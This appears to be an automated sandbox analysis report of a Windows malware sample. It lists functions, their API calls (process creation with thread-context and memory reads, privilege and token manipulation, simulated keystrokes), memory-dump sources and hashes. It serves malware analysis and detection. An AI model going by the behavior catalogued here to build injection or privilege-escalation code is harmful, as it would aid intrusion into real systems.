Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 7ebb676f40773b989208e87165070d556381302e1c9452c77e064409cba70af3
Instruction ID: 331cb407b1fadfa83dac797c5e04f32046ff6b596cbe13932f6b6d4fa7fefce9
Opcode Fuzzy Hash: 7ebb676f40773b989208e87165070d556381302e1c9452c77e064409cba70af3
Instruction Fuzzy Hash: 41F02B31D30602AADB1AFF75880675E76E46F01334F268109E420AB2C1C77C8A219F59

Function 01875E3D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 018765FB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01876691
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018766B3

Memory Dump Source

Source File: 00000000.00000002.2157695830.0000000001874000.00000040.00000020.00020000.00000000.sdmp, Offset: 01874000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1874000_WDpjhC3jpq.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction ID: 7dc23891a8254327f6599471d01dd4e4ec4ec6127cee25940c8880c20e9dcefd
Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction Fuzzy Hash: E412BF24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 0022E8A0 Relevance: 1.7, APIs: 1, Instructions: 209windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0022E959

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 5fb91bee60f2edaade93ef6cd9ff9cc29fefd584f8c88f4a5cd7a39e747f0649
Instruction ID: 678700512262c063b7e121a8070c7dd2ad053f274e78ce5db7b75b3e1309ab00
Opcode Fuzzy Hash: 5fb91bee60f2edaade93ef6cd9ff9cc29fefd584f8c88f4a5cd7a39e747f0649
Instruction Fuzzy Hash: 59812A709183E19FEF26CF64E4883A97BD0BB11304F09497ED8898F262D3749995CB52

Function 00242957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00242A0B

Part of subcall function 00247C0E: __getptd_noexit.LIBCMT ref: 00247C0E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: 01fe2fa9aaca25b2ef8a488ce84d38ea85fe43adb890c170081ec87bb7cd0797
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: 0B419371720717DFDB2C8EABC8805AE7BA6AF44360B64852DF855C7240EBB0DD698B40

Function 0023ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0023EDC7

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: d7ee5314161e62895f06147f49d005dc3f7db56a53a2695bd384278868da93e9
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 6731D7B0A1010A9BCB18DF18C480969FBAAFF49340F6586A5E40ADF395DB30EDD5CB80

Function 00299A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00299A80

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: e08c021b32e7b0c01b00cd5d6d2d357aeab993bc5ff424d9a9dfa59ba370b9f6
Instruction ID: c7e5afcf2218c337e1f28b56cab6778ddf45338be5fabd354377d0bb836614ad
Opcode Fuzzy Hash: e08c021b32e7b0c01b00cd5d6d2d357aeab993bc5ff424d9a9dfa59ba370b9f6
Instruction Fuzzy Hash: D5417FB05146118FDB24CF18C494B1ABBE0BF45308F1989ACE99A4B362C776FC95CF52

Function 002241A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00224214: FreeLibrary.KERNEL32(00000000,?), ref: 00224247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002239FE,?,00000001), ref: 002241DB

Part of subcall function 00224291: FreeLibrary.KERNEL32(00000000), ref: 002242C4

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 3f9571cbce8bf1b3985e336b2c14ebe6abfb862ed0a8c02a794661c15f17fa66
Instruction ID: b9020b326a8dadaa0b764d5e982cdcf1e2ef3bb7b394c558c3ec3ed975567369
Opcode Fuzzy Hash: 3f9571cbce8bf1b3985e336b2c14ebe6abfb862ed0a8c02a794661c15f17fa66
Instruction Fuzzy Hash: 8211C431630226BACF14BBB1EC16F9E77A59F40700F208529B996AA181DA709A619F60

Function 00299B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00299B51

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 120d074329e137c8e3d83e254b8ecb555482943a3b595a49963306c1c84f6865
Instruction ID: ce2be6ea840bc3014b537dbbf8371f7830141a579b15148d3549cbd9cc417d09
Opcode Fuzzy Hash: 120d074329e137c8e3d83e254b8ecb555482943a3b595a49963306c1c84f6865
Instruction Fuzzy Hash: B72157B05283018FDB24DF64D484B1ABBF1BF88304F144968E59A4B622C731F865CF52

Function 0024AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0024AFC0

Part of subcall function 00247BDA: __getptd_noexit.LIBCMT ref: 00247BDA

Part of subcall function 00247C0E: __getptd_noexit.LIBCMT ref: 00247C0E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 72ab4fcddb6349ace44e73b9152e96f1adcf9dcff9816d1f3308868190be6a6d
Instruction ID: 874a09db096355ff54dd51621ea00437384c6f6e06f2b73b2bc811b420c3d97d
Opcode Fuzzy Hash: 72ab4fcddb6349ace44e73b9152e96f1adcf9dcff9816d1f3308868190be6a6d
Instruction Fuzzy Hash: 9611BF728746508BD71F6FA4D88676A3A60AF82336F265640E4345F1E2C7B5CD318FA2

Function 002239DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction ID: 66e6c3c5aba2090e31c432f7233154a5479aa90a73483cc9ce05a86776e623a7
Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction Fuzzy Hash: 9101863142011AFECF04EFA4D8918FEBB74AF10304F108166B55597195EA309A69CF60

Function 00242AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00242AED

Part of subcall function 00247C0E: __getptd_noexit.LIBCMT ref: 00247C0E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: a15cbe778e2658862bba8a9d33ed96a78a7805f4bea045c97a750cc2925e1663
Instruction ID: e9b91b6d82ab7eac7db74688a331a5c8c486db3d0aa90cd58a49ea1ee196c2c7
Opcode Fuzzy Hash: a15cbe778e2658862bba8a9d33ed96a78a7805f4bea045c97a750cc2925e1663
Instruction Fuzzy Hash: D7F0C231560215EADF2EAF768C0A79F36A5BF01314F548415B8109A191C7788A76DF51

Function 00224252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,002239FE,?,00000001), ref: 00224286

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 1aabe9d53e654c137cd5ec94c59e6ec145a6436cb3d19b17972d11e2b925e4b8
Instruction ID: 55c26137033045d66ea400bc84191fec6649e20ab55f9c1ce14696caa3249ad9
Opcode Fuzzy Hash: 1aabe9d53e654c137cd5ec94c59e6ec145a6436cb3d19b17972d11e2b925e4b8
Instruction Fuzzy Hash: 37F03071525722EFCB34AFA6E494856B7E4FF043153248B3EF5D682510C7719850DF50

Function 002240A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002240C6

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 65470d520700a2b952cd90348af4947f24c1b403051a872ae2659ab07a442e29
Instruction ID: 5aea97622f1a4bd62e7292cd6f6590d72ba0bf9777cad6f8a70d96b8e0c30eb0
Opcode Fuzzy Hash: 65470d520700a2b952cd90348af4947f24c1b403051a872ae2659ab07a442e29
Instruction Fuzzy Hash: 22E0CD375002245BC7119654DC46FEA779DDFCC690F050075F909D7244DD6499818A90

Function 01876E40 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01876E51

Memory Dump Source

Source File: 00000000.00000002.2157695830.0000000001874000.00000040.00000020.00020000.00000000.sdmp, Offset: 01874000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1874000_WDpjhC3jpq.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 4ee86c3e62e874aee8041b00f73c97b208113c475f4ef8d7c7b4b6d59a8c9e85
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 23E0E67594010DDFDB00EFB4D54969E7FB4EF04701F100561FD01D2281D6319E509A72

Non-executed Functions

Function 0028F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0023B34E: GetWindowLongW.USER32(?,000000EB), ref: 0023B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0028F87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0028F8DC
GetWindowLongW.USER32(?,000000F0), ref: 0028F919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0028F940
SendMessageW.USER32 ref: 0028F966
_wcsncpy.LIBCMT ref: 0028F9D2
GetKeyState.USER32(00000011), ref: 0028F9F3
GetKeyState.USER32(00000009), ref: 0028FA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0028FA16
GetKeyState.USER32(00000010), ref: 0028FA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0028FA4F
SendMessageW.USER32 ref: 0028FA72
SendMessageW.USER32(?,00001030,?,0028E059), ref: 0028FB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0028FB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0028FB96
SetCapture.USER32(?), ref: 0028FB9F
ClientToScreen.USER32(?,?), ref: 0028FC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0028FC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0028FC29
ReleaseCapture.USER32 ref: 0028FC34
GetCursorPos.USER32(?), ref: 0028FC69
ScreenToClient.USER32(?,?), ref: 0028FC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 0028FCD8
SendMessageW.USER32 ref: 0028FD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 0028FD41
SendMessageW.USER32 ref: 0028FD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0028FD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0028FD8F
GetCursorPos.USER32(?), ref: 0028FDB0
ScreenToClient.USER32(?,?), ref: 0028FDBD
GetParent.USER32(?), ref: 0028FDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 0028FE3F
SendMessageW.USER32 ref: 0028FE6F
ClientToScreen.USER32(?,?), ref: 0028FEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0028FEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0028FF19
SendMessageW.USER32 ref: 0028FF3C
ClientToScreen.USER32(?,?), ref: 0028FF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0028FFB6
GetWindowLongW.USER32(?,000000F0), ref: 0029004B

Strings

@GUI_DRAGID, xrefs: 0028FBCC
F, xrefs: 0028FF42

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: 7d3c713f561b306efc3ce0b0aa0f55bc16c4deb29447533c850b419a6b718249
Instruction ID: ef8ec7c652834f94213ca674d61b563f787dc33d4b4ce4aa0d608048698ac3bf
Opcode Fuzzy Hash: 7d3c713f561b306efc3ce0b0aa0f55bc16c4deb29447533c850b419a6b718249
Instruction Fuzzy Hash: 8E32ED78625346EFDB10EF64D988BAABBA8FF49354F040629F695872E0C770DC60CB51

Function 0028AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0028B1CD

Strings

%d/%02d/%02d, xrefs: 0028AEFC

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: f8cb0fd769debabf17e63dd4fd26eaf825a01de16eaa92df35d78974b9ee2d83
Instruction ID: b93c8bc72bc04a9b9674b30a82e3034626af406238c9f5c8c6a6000a799e54ad
Opcode Fuzzy Hash: f8cb0fd769debabf17e63dd4fd26eaf825a01de16eaa92df35d78974b9ee2d83
Instruction Fuzzy Hash: 7A123274521209ABEB25AF64EC49FAF7BB8FF45710F14411AFA0ADB2D1DBB09811CB11

Function 0023EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0023EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00293AEA
IsIconic.USER32(000000FF), ref: 00293AF3
ShowWindow.USER32(000000FF,00000009), ref: 00293B00
SetForegroundWindow.USER32(000000FF), ref: 00293B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00293B20
GetCurrentThreadId.KERNEL32 ref: 00293B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00293B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00293B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00293B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00293B54
SetForegroundWindow.USER32(000000FF), ref: 00293B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00293B6C
keybd_event.USER32(00000012,00000000), ref: 00293B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00293B81
keybd_event.USER32(00000012,00000000), ref: 00293B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00293B8F
keybd_event.USER32(00000012,00000000), ref: 00293B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00293B9E
keybd_event.USER32(00000012,00000000), ref: 00293BA3
SetForegroundWindow.USER32(000000FF), ref: 00293BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00293BCD

Strings

Shell_TrayWnd, xrefs: 00293AE5

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 14d2425cdf393b42af19eadb6d7f4ba0d042f97b676c17f81f6a41ef4a247a89
Instruction ID: 5087c3853bf8a3c8528d62a2ca342a72df7be40cea6ed18bbc9bba049b9797db
Opcode Fuzzy Hash: 14d2425cdf393b42af19eadb6d7f4ba0d042f97b676c17f81f6a41ef4a247a89
Instruction Fuzzy Hash: AE31A4B1A50318BBEF206F65AC4DF7F7F6CEB45B54F104015FA06EA1D0DAB05D10AAA0

Function 0025ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0025B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0025B180
Part of subcall function 0025B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0025B1AD
Part of subcall function 0025B134: GetLastError.KERNEL32 ref: 0025B1BA

_memset.LIBCMT ref: 0025AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0025AD5A
CloseHandle.KERNEL32(?), ref: 0025AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0025AD82
GetProcessWindowStation.USER32 ref: 0025AD9B
SetProcessWindowStation.USER32(00000000), ref: 0025ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0025ADBF

Part of subcall function 0025AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0025ACC0), ref: 0025AB99
Part of subcall function 0025AB84: CloseHandle.KERNEL32(?,?,0025ACC0), ref: 0025ABAB

Strings

winsta0, xrefs: 0025AD7D
H*-, xrefs: 0025AE40
default, xrefs: 0025ADBA
, xrefs: 0025AD17

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
